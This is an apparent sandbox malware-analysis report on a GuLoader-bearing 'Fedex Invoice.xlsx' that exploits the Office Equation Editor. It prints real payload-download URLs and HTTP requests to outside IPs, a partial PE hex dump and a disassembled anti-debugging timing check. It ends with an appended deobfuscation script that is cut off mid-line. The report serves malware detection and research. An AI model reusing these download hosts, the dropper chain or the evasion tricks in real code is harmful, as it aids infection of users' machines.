
Windows Analysis Report Fedex Invoice.xlsx

Overview

General Information

Sample Name: Fedex Invoice.xlsx
Analysis ID: 483375
MD5: ec7f52b07d135f71c63fd20054a89646
SHA1: c89fa952eaef37a4ad0a120fa2c998cd989bbf62
SHA256: 150f45aec13d1ab1c92977d65ca5e88fd84aaba570446006265afdbcb85d03a6
Tags: FEDEX, VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1256 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2624 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1712 cmdline: 'C:\Users\Public\vbc.exe' MD5: ED004FE1AA9F4FA169A05B6716C03484)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://37.0.11.217/KELLYREMCOS_UOuJB118.bin"}

Yara Overview

Memory Dumps

Source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings: (none listed)

    Sigma Overview

    Exploits:

    Sigma detected: EQNEDT32.EXE connecting to internet
    Source: Network Connection; Author: Joe Security; Data: DestinationIp: 212.192.246.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2624, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXE
    Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2624, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    Sigma detected: Droppers Exploiting CVE-2017-11882
    Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2624, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1712
    Sigma detected: Execution from Suspicious Folder
    Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2624, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1712

    Jbx Signature Overview


    AV Detection:

    Found malware configuration
    Source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp; Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/KELLYREMCOS_UOuJB118.bin"}
    Multi AV Scanner detection for submitted file
    Source: Fedex Invoice.xlsx; Virustotal: Detection: 30%
    Source: Fedex Invoice.xlsx; ReversingLabs: Detection: 27%
    Multi AV Scanner detection for domain / URL
    Source: http://212.192.246.25/rever/vbc.exe; Virustotal: Detection: 7%
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Virustotal: Detection: 23%
    Machine Learning detection for dropped file
    Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Joe Sandbox ML: detected

    Exploits:

    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
    Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
    Source: excel.exe; Memory has grown: Private usage: 4MB later: 70MB

    Networking:

    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor; URLs: http://37.0.11.217/KELLYREMCOS_UOuJB118.bin
    Source: Joe Sandbox View; ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 19:51:37 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 23:18:39 GMTETag: "21000-5cbe8af7096b4"Accept-Ranges: bytesContent-Length: 135168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 db 56 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 b5 a3 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b9 01 00 28 00 00 00 00 10 02 00 22 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 22 3b 00 00 00 10 02 00 
00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global traffic; HTTP traffic detected:
        GET /rever/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 212.192.246.25
        Connection: Keep-Alive
    Source: unknown; TCP traffic detected without corresponding DNS query: 212.192.246.25 (50 identical entries)
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: 5DD04ABC.emf.0.dr; String found in binary or memory: http://www.day.com/dam/1.0
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD04ABC.emf
    Source: global traffic; HTTP traffic detected:
        GET /rever/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 212.192.246.25
        Connection: Keep-Alive

    System Summary:

    Office equation editor drops PE file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456B60
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045B84C
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455467
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A062
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456872
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A07C
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456C14
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00453417
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00454C34
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00454C3C
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A43B
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A8CD
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004504E1
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456CEF
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004558F7
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004544FC
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004534F9
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00459C85
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045588C
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004570AD
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004560A9
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004568A9
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A4B5
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00459D57
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00457152
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045115A
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045B568
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045517B
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455D07
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00454D0B
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045710A
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00454515
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00453D1D
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455519
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A5C7
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A9C0
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455DCB
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004509E9
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00452DF5
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004535F1
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004545FA
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045618F
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004541A1
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004551B1
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045B5BB
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045B65C
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045265F
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00457267
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00459A6C
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00454A77
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455273
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455601
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045720D
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045B60D
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045BA0B
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455A1C
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045AE2B
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00454E3D
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00453E3F
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A63F
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00459AC5
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004546CA
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00454EE0
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004532FD
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00451EFA
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455EA6
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004586A3
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045B6AB
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004556B5
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045AAB3
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456B5E
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00451F6D
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456B73
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045037E
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045B779
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00451B03
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A709
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455B10
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045731C
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A320
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045AB23
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045533B
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045A7DE
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00459FE7
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004557EF
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455BF6
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_004503F2
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00450382
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045579F
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00459B98
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045339B
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_0045ABA0
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00455FAB
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456B60 NtAllocateVirtualMemory
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456C14 NtAllocateVirtualMemory
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456CEF NtAllocateVirtualMemory
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456B5E NtAllocateVirtualMemory
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00456B73 NtAllocateVirtualMemory
    Source: C:\Users\Public\vbc.exe; Process Stats: CPU usage > 98%
    Source: vbc[1].exe.4.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exe; Memory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exe; Memory allocated: 76E90000 page execute and read and write
    Source: Fedex Invoice.xlsx; Virustotal: Detection: 30%
    Source: Fedex Invoice.xlsx; ReversingLabs: Detection: 27%
    Source: C:\Users\Public\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\Public\vbc.exe; Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$Fedex Invoice.xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRFBCB.tmp
    Source: classification engine; Classification label: mal100.troj.expl.evad.winXLSX@4/21@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match; File source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00419524 push esi; retn 000Ch 6_2_00419679
    Source: C:\Users\Public\vbc.exe; Code function: 6_2_00451120 push FFFFFFB9h; retf 6_2_00451125
    Source: initial sample; Static PE information: section name: .text entropy: 7.10781804596
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (10 identical entries)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process information set: NOOPENFILEERRORBOX (8 identical entries)
    Source: C:\Users\Public\vbc.exe; Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000459872 second address: 0000000000459872 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 1ECE1B4Fh 0x00000007 xor eax, 1DCBF7C6h 0x0000000c xor eax, 314CA14Ah 0x00000011 sub eax, 32494DC2h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FD8B8FCB1F8h 0x0000001e lfence 0x00000021 mov edx, 823F9AFEh 0x00000026 add edx, 01EEC23Dh 0x0000002c xor edx, 2B36126Dh 0x00000032 xor edx, D0E64F42h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d jmp 00007FD8B8FCB236h 0x0000003f cmp bh, ch 0x00000041 ret 0x00000042 sub edx, esi 0x00000044 ret 0x00000045 test ax, bx 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 test eax, edx 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007FD8B8FCB1D7h 0x0000005b call 00007FD8B8FCB28Bh 0x00000060 call 00007FD8B8FCB219h 0x00000065 lfence 0x00000068 mov edx, 823F9AFEh 0x0000006d add edx, 01EEC23Dh 0x00000073 xor edx, 2B36126Dh 0x00000079 xor edx, D0E64F42h 0x0000007f mov edx, dword ptr [edx] 0x00000081 lfence 0x00000084 jmp 00007FD8B8FCB236h 0x00000086 cmp bh, ch 0x00000088 ret 0x00000089 mov esi, edx 0x0000008b pushad 0x0000008c rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, TID 2560. Thread sleep time: -300000s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, TID 2560. Thread sleep time: -60000s >= -30000s
    Source: C:\Users\Public\vbc.exe. Code function 6_2_0045986A: rdtsc (reported twice)
    Source: C:\Users\Public\vbc.exe. Code function 6_2_00458C21: mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe. Code function 6_2_004544FC: mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe. Code function 6_2_00454515: mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe. Code function 6_2_00453D1D: mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe. Code function 6_2_004566CF: mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe. Code function 6_2_0045939A: mov eax, dword ptr fs:[00000030h]
    (fs:[00000030h] is the PEB pointer in a 32-bit process. Reading it directly, rather than through an API, is the usual route to fields such as BeingDebugged and the loader's module list, and it is not something a user-mode hook can intercept.)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE. Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmp. Binary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmp. Binary or memory string: !Progman
    Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmp. Binary or memory string: Program Manager<
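    Added worked example, not part of the Joe Sandbox report: the constant chains in the interceptor listing above are a light obfuscation, and folding them statically tells you what the timing check actually touches. The script below, written for this page, parses that listing (copied inline from the report), evaluates the mov/add/xor/sub chains with 32-bit wraparound, and records every rdtsc, the cpuid leaf and each dereferenced address. It resolves the eax chain to cpuid leaf 1 and the edx chain to 0x7FFE0014, which is KUSER_SHARED_DATA.SystemTime: KUSER_SHARED_DATA is mapped read-only at 0x7FFE0000 in every Windows process, and the field offsets in the code follow the public ntddk layout (neither fact is on this page, so treat the table as the example's own assumption).

```python
import re

# Constructed input: the instruction listing from the report's "RDTSC
# instruction interceptor" entry for vbc.exe, one instruction per line.
LISTING = """\
0x00000000 rdtsc
0x00000002 mov eax, 1ECE1B4Fh
0x00000007 xor eax, 1DCBF7C6h
0x0000000c xor eax, 314CA14Ah
0x00000011 sub eax, 32494DC2h
0x00000016 cpuid
0x00000018 popad
0x00000019 call 00007FD8B8FCB1F8h
0x0000001e lfence
0x00000021 mov edx, 823F9AFEh
0x00000026 add edx, 01EEC23Dh
0x0000002c xor edx, 2B36126Dh
0x00000032 xor edx, D0E64F42h
0x00000038 mov edx, dword ptr [edx]
0x0000003a lfence
0x0000003d jmp 00007FD8B8FCB236h
0x0000003f cmp bh, ch
0x00000041 ret
0x00000042 sub edx, esi
0x00000044 ret
0x00000045 test ax, bx
0x00000048 add edi, edx
0x0000004a dec dword ptr [ebp+000000F8h]
0x00000050 test eax, edx
0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h
0x00000059 jne 00007FD8B8FCB1D7h
0x0000005b call 00007FD8B8FCB28Bh
0x00000060 call 00007FD8B8FCB219h
0x00000065 lfence
0x00000068 mov edx, 823F9AFEh
0x0000006d add edx, 01EEC23Dh
0x00000073 xor edx, 2B36126Dh
0x00000079 xor edx, D0E64F42h
0x0000007f mov edx, dword ptr [edx]
0x00000081 lfence
0x00000084 jmp 00007FD8B8FCB236h
0x00000086 cmp bh, ch
0x00000088 ret
0x00000089 mov esi, edx
0x0000008b pushad
0x0000008c rdtsc
"""

MASK = 0xFFFFFFFF
INSN_RE = re.compile(r"^0x[0-9a-fA-F]+\s+(\w+)(?:\s+(.+))?$")
IMM_RE = re.compile(r"^([0-9A-Fa-f]{2,})h$")  # 2+ digits: ah/bh/ch/dh are registers, not immediates
DEREF_RE = re.compile(r"^dword ptr \[(\w+)\]$")
# KUSER_SHARED_DATA: fixed read-only user-mode mapping; offsets per the public ntddk layout (assumed, not from the report).
KUSER_SHARED_DATA = 0x7FFE0000
KUSER_FIELDS = {0x0: "TickCountLowDeprecated", 0x4: "TickCountMultiplier",
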